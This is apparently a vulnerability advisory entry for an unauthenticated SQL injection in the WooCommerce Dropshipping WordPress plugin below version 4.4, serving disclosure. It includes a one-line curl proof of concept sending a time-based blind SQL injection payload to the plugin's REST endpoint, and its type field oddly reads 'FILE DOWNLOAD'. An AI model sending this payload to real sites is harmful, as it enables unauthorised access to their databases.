WordPress Plugin Vulnerabilities
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection
Proof of Concept
curl -isk -X 'POST' -H "Content-Type: application/json" --data '{"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(5)))wlHd)-- pOeU"}' 'https://example.com/wp-json/woo-aliexpress/v1/product-sku'
Affects Plugins
References
CVE
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-17 (about 1 years ago)
Added
2022-10-17 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)